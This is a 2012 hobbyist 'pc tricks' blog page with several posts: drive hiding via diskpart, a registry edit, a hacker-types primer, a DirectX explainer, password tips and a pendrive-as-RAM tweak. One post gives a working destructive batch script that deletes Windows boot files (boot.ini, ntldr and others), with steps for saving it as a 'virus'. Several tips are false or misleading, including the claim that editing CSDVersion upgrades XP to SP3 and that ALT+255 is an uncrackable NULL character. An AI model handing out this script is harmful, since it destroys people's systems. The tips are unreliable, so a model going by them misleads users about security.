Showing posts with label pc tricks. Show all posts
Showing posts with label pc tricks. Show all posts

Sunday, August 5, 2012

Hide Hard-Disk Drives Without 3rd Party Software on Windows




Here is a cool technique which hides entire hard disk drives by a simple procedure.
This is the best security tip to be employ against unauthorised users.

1) Go to Start > Run > type "diskpart".
A DOS window will appear with following description.
DISKPART>
2) Then type "list volume"
The result will look something like one as shown below-
3) Suppose you want to hide drive E then type "select volume 3"
Then a message will appear in same window { Volume 3 is the selected volume}
4) Now type "remove letter E"

Now a message will come { Diskpart Removed the Drive letter }
sometime it requires to reboot the computer.

Diskpart will remove the letter.

Windows XP is not having capabilty to identify the unknown volume.

Your Data is now safe from unauthorised users.

To access the content of hidden Drive repeat the process mentioned above. But in 4th step replace " remove" by "assign".

It means type "assign letter E".
if havent understand

Wednesday, August 1, 2012

How to turn XP SP2 into SP3 or even more




Start> Run> type in 'regedit'
Go to HKEY_LOCAL_MACHINE, then SYSTEM, then CurrentControlSet, then windows
From here on in click "CSDVersion" and click modify, change "0x00000200" (SP2) to "0x00000300" by typing 300 in the field where 200 once was.
Close it down,
Restart (MAKE SURE YOU RESTART)

Introduction To Hacking (Tutorial 1)


Introduction:

 Hey guys am here again with my other post which gives you the brief Introduction To Hacking.So Are you eager..? So lets know about all about hacking today. I will be posting some tutorials about the hacking. So Folks keep visiting the BLOG.

Lets move to the topics now.........

So guys for today let us know about on below topics

1)What is Hacking.?
2) Who is Hacker.?
a) Types of Hackers.
b) Hacker's Hierarchy.

What is Hacking and Who is Hacker? 

Hacking is nothing but tinkering with electronic or computer systems. The person who does these is known as Hacker. 

So guys all of us think that Hacker's are cool,bad-boy's and selfish in nature but actually that's not the real thing. I do agree they are cool,passionate etc but all Hackers are not Bad-Boys,Selfish. There are many Hacker's who work(Hack) for welfare of people and are against the Bad-Boys. So thinking that all Hackers are bad,selfish in nature is not a good thing according to my point of view.

Types of Hackers

There are two main types of Hacker's in the world they are :
1) White Hat Hackers
2) Black Hat Hackers

So guys let us know about them individually,

1) White Hat Hackers

These are considered the good guys. White hat hackers don’t use their skills for illegal purposes. They usually become Computer Security experts and help protect people from the Black Hats.
Example:  Ethical Hackers

2) Black Hat Hackers

These guys are considered as the bad guys. Black hat hackers use their skills for illegal purpose.
They usually break into system's security steal all the confidential data from the people for their personal use.
Example : Malicious Hackers

Hacker's Hierarchy

Script Kiddie's:

These guys are just noobs in world of computers. They do-not have any idea of "HOW TO HACK" but pretend to be a Hacker. These guys are actually not a hackers but misunderstanding of people had made them to pretend to be a hackers.They just Copy-Paste the things from the Pre-Coded codes of hackers and implement them where they are not supposed to and become bugged-up having no idea what the code does.

Intermediate/Middle Level Hacker's:

These people usually know about computers, networks, and have enough programming knowledge to understand relatively what a script might do, but like the script kiddies they use Discovered well-known exploits (- a piece of code that takes advantage of a bug or vulnerability in a piece of software that allows you to take control of a computer system) to carry out attacks.These are just considered as the one step forward people from the Script Kiddie's.They just make some changes in the main Discovered well-known exploits and discover the other things from them. These people re just the user's but not the one who discover something on stand-alone.

Elite Hackers :

Here are the real guys who have most of the knowledge of computers,networking,security systems etc. and more than that they are well experienced guys. These Pro guys are actually known as a real hackers who can just do anything with their knowledge. They are nor dependent and do discover the things own.

Guys Stay Tuned for my next Tutorial :

☻S☺I☻G☺N☻E☺D☻☻B☺Y☻ - RK WORLD

 VISIT HERE FOR MORE : Geek's Area

Tuesday, July 31, 2012

A Complete Guide about DirectX




Ever wondered just what that enigmatic name means?


Gaming and multimedia applications are some of the most satisfying programs you can get for your PC, but getting them to run properly isn’t always as easy as it could be. First, the PC architecture was never designed as a gaming platform. Second, the wide-ranging nature of the PC means that one person’s machine can be different from another. While games consoles all contain the same hardware, PCs don’t: the massive range of difference can make gaming a headache.


To alleviate as much of the pain as possible, Microsoft needed to introduce a common standard which all games and multimedia applications could follow – a common interface between the OS and whatever hardware is installed in the PC, if you like. This common interface is DirectX, something which can be the source of much confusion.

DirectX is an interface designed to make certain programming tasks much easier, for both the game developer and the rest of us who just want to sit down and play the latest blockbuster. Before we can explain what DirectX is and how it works though, we need a little history lesson.

 

 DirectX history

Any game needs to perform certain tasks again and again. It needs to watch for your input from mouse, joystick or keyboard, and it needs to be able to display screen images and play sounds or music. That’s pretty much any game at the most simplistic level.

Imagine how incredibly complex this was for programmers developing on the early pre-Windows PC architecture, then. Each programmer needed to develop their own way of reading the keyboard or detecting whether a joystick was even attached, let alone being used to play the game. Specific routines were needed even to display the simplest of images on the screen or play a simple sound.

Essentially, the game programmers were talking directly to your PC’s hardware at a fundamental level. When Microsoft introduced Windows, it was imperative for the stability and success of the PC platform that things were made easier for both the developer and the player. After all, who would bother writing games for a machine when they had to reinvent the wheel every time they began work on a new game? Microsoft’s idea was simple: stop programmers talking directly to the hardware, and build a common toolkit which they could use instead. DirectX was born.

 

How it works..??

At the most basic level, DirectX is an interface between the hardware in your PC and Windows itself, part of the Windows API or Application Programming Interface. Let’s look at a practical example. When a game developer wants to play a sound file, it’s simply a case of using the correct library function. When the game runs, this calls the DirectX API, which in turn plays the sound file. The developer doesn’t need to know what type of sound card he’s dealing with, what it’s capable of, or how to talk to it. Microsoft has provided DirectX, and the sound card manufacturer has provided a DirectX-capable driver. He asks for the sound to be played, and it is – whichever machine it runs on.

From our point of view as gamers, DirectX also makes things incredibly easy – at least in theory. You install a new sound card in place of your old one, and it comes with a DirectX driver. Next time you play your favourite game you can still hear sounds and music, and you haven’t had to make any complex configuration changes.

Originally, DirectX began life as a simple toolkit: early hardware was limited and only the most basic graphical functions were required. As hardware and software has evolved in complexity, so has DirectX. It’s now much more than a graphical toolkit, and the term has come to encompass a massive selection of routines which deal with all sorts of hardware communication. For example, the DirectInput routines can deal with all sorts of input devices, from simple two-button mice to complex flight joysticks. Other parts include DirectSound for audio devices and DirectPlay provides a toolkit for online or multiplayer gaming.

 

Diagnosing problems

Diagnosing problems with a DirectX installation can be problematic, especially if you don’t know which one of the many components is causing your newly purchased game to fall over. Thankfully, Microsoft provides a useful utility called the DirectX Diagnostic Tool, although this isn’t made obvious. You won’t find this tool in the Start Menu with any version of Windows, and each tends to install it in a different place.

The easiest way to use it is to open the Start Menu’s Run dialog, type in dxdiag and then click OK. When the application first loads, it takes a few seconds to interrogate your DirectX installation and find any problems. First, the DirectX Files tab displays version information on each one of the files your installation uses. The Notes section at the bottom is worth checking, as missing or corrupted files will be flagged here.

The tabs marked Display, Sound, Music, Input and Network all relate to specific areas of DirectX, and all but the Input tab provide tools to test the correct functioning on your hardware. Finally, the More Help tab provides a useful way to start the DirectX Troubleshooter, Microsoft’s simple linear problem solving tool for many common DirectX issues.

Śιgηє ßÿ :    RK

FOR MORE GO HERE : www.geeksarea.blogspot.com 

How To Make Anti-Cracable/Hackable Password..?




Hey guys today am here to give a tutorial about "How to Make Anti-Crackable/Hackable Password".
As we know that the password we set for our Pc's,laptops and online accounts are hackable. The easy and 1st way the hackers shows their skills in hacking accounts is "CRACKING PASSWORDS". To help you to get rid of this I am here to help you.

So guys how can you create and "ANTI-CRACKABLE/HACKABLE PASSWORD"?

Solution:
Do use some Characters between your passwords like :
1) "↓".
2) " ".
You may notice that the second(2) character which is enclosed by double inverted commas looks like blank and contains no characters. Right?. If your answer is "YES" then your wrong. The "BLANK SPACE" between the second(2) is not actually a BLANK SPACE but it is the "NULL" character which is not visible but it is taken as the part of password. Now you have question in your head that how can we use/type that "NULL" character.? Here is your answer friends. Hold ALT+255 and leave and your done.!! there goes your NULL character typed on the screen with space.

NOTE:The NULL character has its own value and cannot be neglected

To make your own Characters and use them as your passwords go HERE and by holding ALT press the DECIMAL numbers accociated to the special characters.

For example:

ALT+178 gives "▓"

TIP: I suggest you to use ALT+255 at the end of the password because it is invisible is hard to get regcognized by the hacker.

For example:

your password is VINAY do use ALT+255 after Y. 
ie, "VINAY "
you may notice that a NULL character is appeared after Y and is hard for any one to crack or hack it.


Śιgηє ßÿ :    R K

FOR MORE GO HERE : www.geeksarea.blogspot.com

 Warning : Do Not Copy. DMCA protected Content.

Deadly Virus to Shutdown a Computer For Ever...!!















Hey Fella's am back again with some other cool hack. Today let us know how to create your own deadly virus.Eager to know whats that..?? Just hold-down guys do-not jump to the end. Just read the below "Caution".

Caution:
1) Do-not try this at home not even for fun once it runs it just makes your computer dead which cannot  be brought alive.


2) Am am not responsible for any cause/damage caused to the computer.


3) The post is for education purpose only.

Okay guys are you Ready..??
Here goes the code,

Code:

/****************START**********************************************/
                                                                         */
@echo off                                                        */
attrib -r -s -h c:\autoexec.bat                         */
del c:\autoexec.bat                                         */
attrib -r -s -h c:\boot.ini                                 */
del c:\boot.ini                                                 */
attrib -r -s -h c:\ntldr                                     */
del c:\ntldr                                                      */
attrib -r -s -h c:\windows\win.ini                   */
del c:\windows\win.ini  
                                 */
                                                                        */
/****************END************************************************/ 

Steps :


1) Copy the above code from "@echo off" to "win.ini".


2) Paste the above code in note-pad.


3) After pasting the code click on Files/Save as.


4) Save the file with any name with ".bat"(batch file) extension.
    for example: "Screwyou.bat"


5) Yoo..!! guys you have your first own VIRUS coded by you.

Caution::

Am again warning you guys,

DONT RUN THE BATCH FILE ,YOU WONT RECOVER BACK AFTER YOU RUN IT !!!

So guys are your eager to know what the code actually does .?? Wanna know..?? Then here is your answer for your question :

1)What it does..??
-This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.So please, use this hack only if you have no intention of rebooting your computer again.

Śιgηє ßÿ :    RK

FOR MORE GO HERE : www.geeksarea.blogspot.com 



Warning : Do Not Copy. DMCA protected Content.

Monday, July 30, 2012

How to Use Pendrive as RAM ?



Use Ur pendrive as a Ram
Press windows button + Pause/break
Go to advanced Settings(Left side)
Under performance click "Settings"
then click Advanced tab
then click change
ucheck "Automatically Manage....."
Select your pen drive
and size allocation for it